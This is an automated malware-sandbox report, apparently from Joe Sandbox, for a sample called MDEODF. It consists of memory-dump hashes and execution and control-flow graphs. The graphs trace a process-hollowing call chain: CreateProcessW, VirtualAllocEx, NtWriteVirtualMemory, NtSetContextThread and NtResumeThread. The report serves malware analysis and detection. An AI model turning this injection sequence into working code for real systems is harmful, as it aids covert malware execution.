                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 30cb213ac67cb3625f4b74ce77f893173baafc8f19b1955d73639a4d44f36ae1
                                    • Instruction ID: 938c247987453322542058079b7286a0391981f2c6c7acc1b9ef1cb9c7c0e40e
                                    • Opcode Fuzzy Hash: 30cb213ac67cb3625f4b74ce77f893173baafc8f19b1955d73639a4d44f36ae1
                                    • Instruction Fuzzy Hash: A5E08C3600D3C49FC7068FA09C248A93F269F5A200B08C0DAF8C48A1A3C5318861D722
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d312bbdc3dad39e55d0e4a8b2edb11def89cfdaea8576af28a2ab1166dcd810c
                                    • Instruction ID: 176647db34ab5ac5906638f808d29dec0fd2629a8fd684d31cad27647a8893ad
                                    • Opcode Fuzzy Hash: d312bbdc3dad39e55d0e4a8b2edb11def89cfdaea8576af28a2ab1166dcd810c
                                    • Instruction Fuzzy Hash: 32D0127A10424CAB8B09CF95EC14CFA7B6FAB88211B04C019FD1945151CA32D961EB60

                                    Execution Graph

                                    Execution Coverage:27%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:129
                                    Total number of Limit Nodes:0
                                    execution_graph 5065 309db0 5069 309dcc 5065->5069 5066 309ee7 5112 30d6b2 5066->5112 5071 30c921 5069->5071 5072 30c964 5071->5072 5153 30d478 5072->5153 5158 30d488 5072->5158 5073 30cb1b 5098 30d478 2 API calls 5073->5098 5099 30d488 2 API calls 5073->5099 5074 30cb5f 5163 30c458 5074->5163 5167 30c451 5074->5167 5075 30cbe5 5102 30d478 2 API calls 5075->5102 5103 30d488 2 API calls 5075->5103 5076 30cc71 5171 30c550 5076->5171 5175 30c558 5076->5175 5077 30ccaf 5086 30d478 2 API calls 5077->5086 5087 30d488 2 API calls 5077->5087 5078 30cdd8 5179 30c678 5078->5179 5183 30c670 5078->5183 5079 30ce14 5096 30d478 2 API calls 5079->5096 5097 30d488 2 API calls 5079->5097 5080 30d19c 5110 30c670 NtWriteVirtualMemory 5080->5110 5111 30c678 NtWriteVirtualMemory 5080->5111 5081 30d2a5 5094 30d478 2 API calls 5081->5094 5095 30d488 2 API calls 5081->5095 5082 30d2f3 5187 30c7d0 5082->5187 5191 30c7c8 5082->5191 5083 30d39b 5108 30c451 NtResumeThread 5083->5108 5109 30c458 NtResumeThread 5083->5109 5084 30d418 5084->5066 5085 30ce73 5085->5080 5092 30c670 NtWriteVirtualMemory 5085->5092 5093 30c678 NtWriteVirtualMemory 5085->5093 5086->5078 5087->5078 5092->5085 5093->5085 5094->5082 5095->5082 5096->5085 5097->5085 5098->5074 5099->5074 5102->5076 5103->5076 5108->5084 5109->5084 5110->5081 5111->5081 5113 30d6f4 5112->5113 5203 30e218 5113->5203 5208 30e208 5113->5208 5114 30d8ab 5151 30e218 2 API calls 5114->5151 5152 30e208 2 API calls 5114->5152 5115 30d8ef 5127 30c451 NtResumeThread 5115->5127 5128 30c458 NtResumeThread 5115->5128 5116 30d975 5129 30e218 2 API calls 5116->5129 5130 30e208 2 API calls 5116->5130 5117 30da01 5131 30c550 VirtualAllocEx 5117->5131 5132 30c558 VirtualAllocEx 5117->5132 5118 30da3f 5139 30e218 2 API calls 5118->5139 5140 30e208 2 API calls 5118->5140 5119 30db68 5141 30c670 NtWriteVirtualMemory 5119->5141 5142 30c678 NtWriteVirtualMemory 5119->5142 5120 30dba4 5149 30e218 2 API calls 5120->5149 5150 30e208 2 API calls 5120->5150 5121 30dc03 5122 30df2c 5121->5122 5143 30c670 NtWriteVirtualMemory 5121->5143 5144 30c678 NtWriteVirtualMemory 5121->5144 5137 30c670 NtWriteVirtualMemory 5122->5137 5138 30c678 NtWriteVirtualMemory 5122->5138 5123 30e035 5147 30e218 2 API calls 5123->5147 5148 30e208 2 API calls 5123->5148 5124 30e083 5133 30c7d0 NtSetContextThread 5124->5133 5134 30c7c8 NtSetContextThread 5124->5134 5125 30e12b 5135 30c451 NtResumeThread 5125->5135 5136 30c458 NtResumeThread 5125->5136 5126 309f49 5127->5116 5128->5116 5129->5117 5130->5117 5131->5118 5132->5118 5133->5125 5134->5125 5135->5126 5136->5126 5137->5123 5138->5123 5139->5119 5140->5119 5141->5120 5142->5120 5143->5121 5144->5121 5147->5124 5148->5124 5149->5121 5150->5121 5151->5115 5152->5115 5154 30d4ac 5153->5154 5195 30c320 5154->5195 5199 30c328 5154->5199 5155 30d561 5155->5073 5159 30d4ac 5158->5159 5161 30c320 NtReadVirtualMemory 5159->5161 5162 30c328 NtReadVirtualMemory 5159->5162 5160 30d561 5160->5073 5161->5160 5162->5160 5164 30c49c NtResumeThread 5163->5164 5166 30c4f3 5164->5166 5166->5075 5168 30c49c NtResumeThread 5167->5168 5170 30c4f3 5168->5170 5170->5075 5172 30c59c VirtualAllocEx 5171->5172 5174 30c614 5172->5174 5174->5077 5176 30c59c VirtualAllocEx 5175->5176 5178 30c614 5176->5178 5178->5077 5180 30c6c1 NtWriteVirtualMemory 5179->5180 5182 30c75a 5180->5182 5182->5079 5184 30c6c1 NtWriteVirtualMemory 5183->5184 5186 30c75a 5184->5186 5186->5079 5188 30c819 NtSetContextThread 5187->5188 5190 30c891 5188->5190 5190->5083 5192 30c819 NtSetContextThread 5191->5192 5194 30c891 5192->5194 5194->5083 5196 30c374 NtReadVirtualMemory 5195->5196 5198 30c3ec 5196->5198 5198->5155 5200 30c374 NtReadVirtualMemory 5199->5200 5202 30c3ec 5200->5202 5202->5155 5204 30e23c 5203->5204 5206 30c320 NtReadVirtualMemory 5204->5206 5207 30c328 NtReadVirtualMemory 5204->5207 5205 30e2f1 5205->5114 5206->5205 5207->5205 5209 30e23c 5208->5209 5211 30c320 NtReadVirtualMemory 5209->5211 5212 30c328 NtReadVirtualMemory 5209->5212 5210 30e2f1 5210->5114 5211->5210 5212->5210 5213 30b870 5216 30b900 CreateProcessW 5213->5216 5215 30bcd4 5216->5215 5217 30be50 5218 30be74 5217->5218 5220 30c320 NtReadVirtualMemory 5218->5220 5221 30c328 NtReadVirtualMemory 5218->5221 5219 30bf29 5220->5219 5221->5219

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 438 30b870-30b92a 440 30b930-30b96b 438->440 441 30b9e2-30b9f7 438->441 454 30b9a3-30b9b4 440->454 455 30b96d-30b975 440->455 442 30baa7-30baab 441->442 443 30b9fd-30ba43 441->443 444 30baf5-30bb46 442->444 445 30baad-30baef 442->445 463 30ba81-30ba8c 443->463 464 30ba45-30ba4d 443->464 448 30bb4c-30bb87 444->448 449 30bbfe-30bc10 444->449 445->444 482 30bb89-30bb91 448->482 483 30bbbf-30bbd0 448->483 452 30bc12-30bc2a 449->452 453 30bc2d-30bc3f 449->453 452->453 458 30bc41-30bc59 453->458 459 30bc5c-30bcd2 CreateProcessW 453->459 471 30b9ba-30b9da 454->471 461 30b977-30b981 455->461 462 30b998-30b9a1 455->462 458->459 465 30bcd4-30bcda 459->465 466 30bcdb-30bd1c 459->466 467 30b983 461->467 468 30b985-30b994 461->468 462->471 480 30ba92-30baa1 463->480 469 30ba70-30ba7f 464->469 470 30ba4f-30ba59 464->470 465->466 484 30bd33-30bd4a 466->484 485 30bd1e-30bd2d 466->485 467->468 468->468 479 30b996 468->479 469->480 477 30ba5b 470->477 478 30ba5d-30ba6c 470->478 471->441 477->478 478->478 486 30ba6e 478->486 479->462 480->442 487 30bb93-30bb9d 482->487 488 30bbb4-30bbbd 482->488 491 30bbd6-30bbf6 483->491 496 30bd63-30bd73 484->496 497 30bd4c-30bd58 484->497 485->484 486->469 489 30bba1-30bbb0 487->489 490 30bb9f 487->490 488->491 489->489 493 30bbb2 489->493 490->489 491->449 493->488 498 30bd75-30bd84 496->498 499 30bd8a-30bdcd 496->499 497->496 498->499 504 30bddd-30bde1 499->504 505 30bdcf-30bdd3 499->505 507 30bdf1-30bdf5 504->507 508 30bde3-30bde7 504->508 505->504 506 30bdd5-30bdd8 call 300420 505->506 506->504 511 30be05 507->511 512 30bdf7-30bdfb 507->512 508->507 510 30bde9-30bdec call 300420 508->510 510->507 512->511 514 30bdfd-30be00 call 300420 512->514 514->511
                                    APIs
                                    • CreateProcessW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?), ref: 0030BCBF
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.377619117.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: 2f4f15510423cb727dee9df8e906525ee2a3e801f8594d9c0406463ce9f24cc5
                                    • Instruction ID: ca0ca2e0b85259012a1a2ca23c00ecff28beec2d32c9d008125d23661f9bead5
                                    • Opcode Fuzzy Hash: 2f4f15510423cb727dee9df8e906525ee2a3e801f8594d9c0406463ce9f24cc5
                                    • Instruction Fuzzy Hash: 1302CD74E01229CFDB25CFA9C891B9DFBB1BF49304F1081A9E819B7291DB349A85CF54

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 822 30c670-30c6e0 824 30c6e2-30c6f4 822->824 825 30c6f7-30c758 NtWriteVirtualMemory 822->825 824->825 827 30c761-30c7b3 825->827 828 30c75a-30c760 825->828 828->827
                                    APIs
                                    • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 0030C748
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.377619117.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID: MemoryVirtualWrite
                                    • String ID:
                                    • API String ID: 3527976591-0
                                    • Opcode ID: 52cbf98037d8fa3889926ec85a058a46c63661c86a3de33be5d72b80bb6e260b
                                    • Instruction ID: f99e1c93cc9a1014d12a2c2eca5afdfc0206f1591c8712c2501c6f001b032842
                                    • Opcode Fuzzy Hash: 52cbf98037d8fa3889926ec85a058a46c63661c86a3de33be5d72b80bb6e260b
                                    • Instruction Fuzzy Hash: 9141BAB5D012489FCF10CFA9D984AEEFBF1AF49314F24942AE815B7250C338AA45CF64

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 833 30c678-30c6e0 835 30c6e2-30c6f4 833->835 836 30c6f7-30c758 NtWriteVirtualMemory 833->836 835->836 838 30c761-30c7b3 836->838 839 30c75a-30c760 836->839 839->838
                                    APIs
                                    • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 0030C748
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.377619117.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID: MemoryVirtualWrite
                                    • String ID:
                                    • API String ID: 3527976591-0
                                    • Opcode ID: b62408250f743532bbd8d0751ef145b85175377f0defd38dae2125c4a6646d00
                                    • Instruction ID: 37d95389433e59f47f4c40c930bfc7566fc12520e5f1a33ed045b0f5700f5058
                                    • Opcode Fuzzy Hash: b62408250f743532bbd8d0751ef145b85175377f0defd38dae2125c4a6646d00
                                    • Instruction Fuzzy Hash: D241A9B5D012589FCF00CFA9D984AEEFBF1BB49314F24942AE814B7250D339AA45CF64

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 844 30c320-30c3ea NtReadVirtualMemory 847 30c3f3-30c445 844->847 848 30c3ec-30c3f2 844->848 848->847
                                    APIs
                                    • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 0030C3DA
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.377619117.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID: MemoryReadVirtual
                                    • String ID:
                                    • API String ID: 2834387570-0
                                    • Opcode ID: 21a060a1c5665d855cbe166ef76057e7c4d758d63d787548af0a90763d110ad4
                                    • Instruction ID: 9c78550673e0c2edc4deff2e6e74d168ddfe7f976b84422a314e75ceae4fe69f
                                    • Opcode Fuzzy Hash: 21a060a1c5665d855cbe166ef76057e7c4d758d63d787548af0a90763d110ad4
                                    • Instruction Fuzzy Hash: 8441ACB9D002589FCF10CFA9D894AEEFBB1BF49310F14A42AE815B7250C779A945CF64

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 853 30c328-30c3ea NtReadVirtualMemory 856 30c3f3-30c445 853->856 857 30c3ec-30c3f2 853->857 857->856
                                    APIs
                                    • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 0030C3DA
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.377619117.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID: MemoryReadVirtual
                                    • String ID:
                                    • API String ID: 2834387570-0
                                    • Opcode ID: 3fc3c7fc1393db1655979af044fbe6e6fef05ebf0b3c4a72fbb03470bd03bc93
                                    • Instruction ID: 23474d06bb743cebc10bf6e6959f5a1f0e8c018f7b2f00af75efa3357c1b8103
                                    • Opcode Fuzzy Hash: 3fc3c7fc1393db1655979af044fbe6e6fef05ebf0b3c4a72fbb03470bd03bc93
                                    • Instruction Fuzzy Hash: 2441BCB9D002589FCF10CFAAD884AEEFBB1BF49310F10A42AE814B7250C734A945CF64

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 880 30c7c8-30c830 882 30c832-30c844 880->882 883 30c847-30c88f NtSetContextThread 880->883 882->883 885 30c891-30c897 883->885 886 30c898-30c8e4 883->886 885->886
                                    APIs
                                    • NtSetContextThread.NTDLL(?,?), ref: 0030C87F
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.377619117.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID: ContextThread
                                    • String ID:
                                    • API String ID: 1591575202-0
                                    • Opcode ID: dda48ceeaa6c58c3efb317f82795b11c0303d743b396310133bca0c562a3f5d5
                                    • Instruction ID: 9630fdc08a0750e91c7fd11bf05eadb3b28dbfb95a671ff7a56d8082eed704a4
                                    • Opcode Fuzzy Hash: dda48ceeaa6c58c3efb317f82795b11c0303d743b396310133bca0c562a3f5d5
                                    • Instruction Fuzzy Hash: 5341CBB5D012589FCB10CFAAD884AEEFBF1BF49314F24902AE415B7250C778A949CF64
                                    APIs
                                    • NtSetContextThread.NTDLL(?,?), ref: 0030C87F
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.377619117.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID: ContextThread
                                    • String ID:
                                    • API String ID: 1591575202-0
                                    • Opcode ID: 725ff61bc5154420fe0e4ef1aeb65d3ab66a83b62cbdb1c3cc324dfa4bd0c7b6
                                    • Instruction ID: 1e1e3c32383bdb2c662a98d12d7c73447f66e0c69fcefb802b3338950863cef4
                                    • Opcode Fuzzy Hash: 725ff61bc5154420fe0e4ef1aeb65d3ab66a83b62cbdb1c3cc324dfa4bd0c7b6
                                    • Instruction Fuzzy Hash: C731BBB5D012589FCB10CFAAD884AEEFBF1BF49314F24902AE414B7240C778A949CF64
                                    APIs
                                    • NtResumeThread.NTDLL(?,?), ref: 0030C4E1
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.377619117.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    • Opcode ID: ba1fe3aa70bf359c8633f12a1e59d319b051a38a828ed099681eb54d3213730d
                                    • Instruction ID: ce274fd4cf826330f576d823270beea333726f18c2fdab37dbfe9e99e3dec734
                                    • Opcode Fuzzy Hash: ba1fe3aa70bf359c8633f12a1e59d319b051a38a828ed099681eb54d3213730d
                                    • Instruction Fuzzy Hash: AD31B9B8D012089FCB10CFA9E994AEEFBF1BB49310F20952AE805B7350C774A945CF64
                                    APIs
                                    • NtResumeThread.NTDLL(?,?), ref: 0030C4E1
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.377619117.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    • Opcode ID: 04443359629c3b20fa7c8e83339c53cdef3daf2377fd926557bbfedfa041937c
                                    • Instruction ID: fda82db515cb17608592e782983d42b92905bff75878abe85933e73c38acf238
                                    • Opcode Fuzzy Hash: 04443359629c3b20fa7c8e83339c53cdef3daf2377fd926557bbfedfa041937c
                                    • Instruction Fuzzy Hash: E031AAB5D012189FCB10CFA9D984AAEFBF5BB49310F20942AE805B7240C774A945CFA4

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 862 30c550-30c612 VirtualAllocEx 865 30c614-30c61a 862->865 866 30c61b-30c665 862->866 865->866
                                    APIs
                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0030C602
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.377619117.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 93130d42083030871b643dc759f1ca1d15932e6f59a809fdbc1db6f54559cf9a
                                    • Instruction ID: ad050ca8a96a686d95555c138a2864fad237387d88bcb3a482025cbecf6eb2c0
                                    • Opcode Fuzzy Hash: 93130d42083030871b643dc759f1ca1d15932e6f59a809fdbc1db6f54559cf9a
                                    • Instruction Fuzzy Hash: 8031A8B9D002489FCF10CFA9D994AEEFBB1BB49310F24A42AE815B7350C735A945CF65

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 871 30c558-30c612 VirtualAllocEx 874 30c614-30c61a 871->874 875 30c61b-30c665 871->875 874->875
                                    APIs
                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0030C602
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.377619117.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: ced17c63cbd0318115a7cb441ff6f13b5b3d737114a315ef61b732cfb5bcd072
                                    • Instruction ID: 03b2c8dfd843845a7d73b405eedbdb3cd082e5a502b31e4e14d862c7e87d4f31
                                    • Opcode Fuzzy Hash: ced17c63cbd0318115a7cb441ff6f13b5b3d737114a315ef61b732cfb5bcd072
                                    • Instruction Fuzzy Hash: A131A8B9D002489FCF10CFA9D984AEEFBB5BB49310F24A42AE814B7310D735A945CF64
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.375934302.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (e'$@T'$@T'$dp
                                    • API String ID: 0-2762516323
                                    • Opcode ID: 2e5517f764fadafbda18ccaa8e2ac00a33eabc138be2ad458c466cd433b9de1e
                                    • Instruction ID: 58fe2b132d69f07050bbc3317dd84dbd646dfed627fa610114bd1b77b6f88075
                                    • Opcode Fuzzy Hash: 2e5517f764fadafbda18ccaa8e2ac00a33eabc138be2ad458c466cd433b9de1e
                                    • Instruction Fuzzy Hash: 1A82B074901229CFCB25DFA8D894BDDB7B5BF49300F1086AAD409AB365DB30AE85CF54
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.375934302.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: pR'
                                    • API String ID: 0-2251766783
                                    • Opcode ID: a8739c88c5180c35cccbab137d59b62f43b4ef39143b90969e6177924bdc5e4d
                                    • Instruction ID: c3e7b03bd226cf389ad84a701f87cd90f43735a7d72a176c099030f0fae1b9ff
                                    • Opcode Fuzzy Hash: a8739c88c5180c35cccbab137d59b62f43b4ef39143b90969e6177924bdc5e4d
                                    • Instruction Fuzzy Hash: 0F214C70E0125A9FCF05DBA8D450ADDBFB1AF49300F4582A6D464BB262D770A94ACF50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.375934302.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: dP'
                                    • API String ID: 0-2939048657
                                    • Opcode ID: 4025d41ae3cf11e70a247cb6e1152fba3415d3505a71e7657c5fc4fac8b303be
                                    • Instruction ID: 559d554071bd760c47ee3584435233e1fb42aac9106bffbfe41f929a3c126180
                                    • Opcode Fuzzy Hash: 4025d41ae3cf11e70a247cb6e1152fba3415d3505a71e7657c5fc4fac8b303be
                                    • Instruction Fuzzy Hash: 4B110D70912309EFCB02FF68E449B4DBBF1EB44304F4089A5D4489B26DDB789A598F95
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.375934302.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 058efe3ca9f205a527844b3423a80b7c378e97c56be92d8b5201d4d0b2b68274
                                    • Instruction ID: 70e95abdd4873c01ecdf8cf59795445233fbc25bccb8f5b65186d99faa7419bd
                                    • Opcode Fuzzy Hash: 058efe3ca9f205a527844b3423a80b7c378e97c56be92d8b5201d4d0b2b68274
                                    • Instruction Fuzzy Hash: 17F03C74D09249CADF01DFA6D4647EEBBF4AB49300F14916AD454B7281D7784649CF50
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.375934302.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_300000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 558a7374cca65b9d0201f68035db721f2e1805220c0d1a567c5d7e8ddeff3b2e
                                    • Instruction ID: d7b8f3f186b72af82ca63a2087c9035fb07f0f267b578637867ec91f748125c8
                                    • Opcode Fuzzy Hash: 558a7374cca65b9d0201f68035db721f2e1805220c0d1a567c5d7e8ddeff3b2e
                                    • Instruction Fuzzy Hash: CCF0B274D0020DDFCB45EFA8E9556AEBBB4FB45300F1046AAC419A7290EB709A84CB80
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.376711678.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_1c0000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: dp
                                    • API String ID: 0-2261812057
                                    • Opcode ID: a495e3e15df0f1aca2c7d9d0e30b5c16aff7f007349ad5d9da29c2f7542addbf
                                    • Instruction ID: f19d0ff10751de61fb1c8ac3082051fe7f1bd443d77817d480f77d4563c2fc29
                                    • Opcode Fuzzy Hash: a495e3e15df0f1aca2c7d9d0e30b5c16aff7f007349ad5d9da29c2f7542addbf
                                    • Instruction Fuzzy Hash: 80829074900229CFCB25DFA8D894BDDBBB5BF49304F1085AAD409AB365D770AE85CF50
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.376711678.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_1c0000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1d291cee3f438889b8d1a9a877dfa8bd3df6165453d4600842547d80eac7dee2
                                    • Instruction ID: 34b4775a4ebd80c6522aa641bf6860f6e56740f78409e14b9a7a55cce5ab2cdb
                                    • Opcode Fuzzy Hash: 1d291cee3f438889b8d1a9a877dfa8bd3df6165453d4600842547d80eac7dee2
                                    • Instruction Fuzzy Hash: 3D3184719093899FC703EBB4E8A8A8D7FB1EB46304F0445EBC0449B167E7748A49CB91
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.376711678.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_1c0000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a713b7c3ecabe5808141c87d6e102ff7bede7a1d22655d96a7f59e1ee4cec1d6
                                    • Instruction ID: 86e107318a05e74c594ef5ce561c584863ad1cefb80be996d75e3a43b16baae3
                                    • Opcode Fuzzy Hash: a713b7c3ecabe5808141c87d6e102ff7bede7a1d22655d96a7f59e1ee4cec1d6
                                    • Instruction Fuzzy Hash: A8218371904349DFC703EFB8E8A578D7FB1EF45308F4089AAD0449B66AE7749989CB81
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.376711678.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_1c0000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bb27ef99912939ebcd84ec372c8012f1c20af8c89cedb91b682be58300f579c8
                                    • Instruction ID: 7959d25e02c2b8dc6f685cd6953f5ea11bc014bc0031872b38a6b44ec11d833c
                                    • Opcode Fuzzy Hash: bb27ef99912939ebcd84ec372c8012f1c20af8c89cedb91b682be58300f579c8
                                    • Instruction Fuzzy Hash: AF215E71D002499FCF05DBA8D450ADDBFB1EF49310F4582A6D454BB262D770AA4ACF50
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.376711678.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_1c0000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 180d3d4655a50af5a3f7cdccd072a69aaa2caddb931f3999b05006f56e2dd2e3
                                    • Instruction ID: 8aced8faaef9ee8645e92f5be27b3bcb1cac9093b91f767ed568b8a3aa651918
                                    • Opcode Fuzzy Hash: 180d3d4655a50af5a3f7cdccd072a69aaa2caddb931f3999b05006f56e2dd2e3
                                    • Instruction Fuzzy Hash: FD112770D00309DFC702EFA8E99574D7BB5FB44308F508966D0449B669DB749A89CF81
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.376711678.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_1c0000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dea0ff62c1b3862ea275659641b5d22698e9f7a2a0d6f5102e2a15088b4744aa
                                    • Instruction ID: de055e2e7bbb4d51983f7228c62fbc4e94b041bea3374feacfbe1dc7ec1c720f
                                    • Opcode Fuzzy Hash: dea0ff62c1b3862ea275659641b5d22698e9f7a2a0d6f5102e2a15088b4744aa
                                    • Instruction Fuzzy Hash: 2BF0AFB5C48289DBCF11DFA5E8147EEBBF0AB5A300F145069C015B7242D7784A45CF61
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.376711678.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_1c0000_MDEODF.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
